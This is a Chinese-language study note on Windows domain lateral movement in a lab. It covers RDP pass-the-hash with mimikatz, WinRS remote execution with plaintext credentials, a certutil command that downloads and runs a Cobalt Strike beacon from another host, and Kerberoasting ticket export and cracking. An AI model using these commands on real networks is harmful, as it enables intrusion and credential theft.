8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

[3.上线 CS&MSF:](#3.上线 CS&MSF:)

[4.CS 内置横向移动](#4.CS 内置横向移动)

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:


一、域横向移动-RDP-明文&NTLM

RDP连接:

1、直接在当前被控主机上进行远程连接

2、建立节点进行连接

3、端口的转发(当前2222去访问目标的3389) ------ 访问被控2222

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService" # 找到对应服务进程的 PID
netstat -ano | find "PID 值 " # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行:

复制代码
明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos 和 NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus

https://github.com/nidem/kerberoast

https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现

•请求服务票据

•服务票据的导出

•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)

黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个

目标服务的服务票证。

DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用

户是否可以访问。

请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码

哈希用于加密服务票证。

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为

Kerberoast攻击。

如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值

就将用于创建服务票证。

Kerberoast攻击条件:

采用rc4加密类型票据,工具Rubeus检测或看票据加密类型

1.扫描:

powershell setspn -T 0day.org -q */*

powershell setspn -T 0day.org -q */* | findstr "MSSQL"

2.检测:

复制代码
Rubeus kerberoast

3.请求:

复制代码
powershell Add-Type -AssemblyName System.IdentityModel

powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"

mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

复制代码
查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

复制代码
python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html

相关推荐
时空潮汐14 小时前
我用神卓 NAT 公网 IP 盒子搭建《我的世界》联机的经历
网络·网络协议·tcp/ip
liulilittle14 小时前
HTTP/3.0:网络通信的技术革新与性能飞跃
网络·网络协议·http·https·quic·流媒体·通信
lingggggaaaa14 小时前
小迪安全v2023学习笔记(八十讲)—— 中间件安全&WPS分析&Weblogic&Jenkins&Jetty&CVE
笔记·学习·安全·web安全·网络安全·中间件·wps
fasewer14 小时前
玄机--windows日志分析
运维·服务器·windows·网络安全
妳人話15 小时前
TCP的三次握手和四次挥手
网络·网络协议·tcp/ip
2501_9160137416 小时前
HTTPS 抓包难点分析,从端口到工具的实战应对
网络协议·http·ios·小程序·https·uni-app·iphone
emma羊羊17 小时前
【 SQL注入漏洞靶场】第二关文件读写
sql·网络安全·靶场·sql注入
Yuki’17 小时前
网络编程---UDP
c语言·网络·网络协议·udp
傻傻虎虎18 小时前
【CentOS7】使用yum安装出错,报HTTPS Error 404 - Not Found
网络协议·http·https
徐子元竟然被占了!!18 小时前
DNS协议
网络协议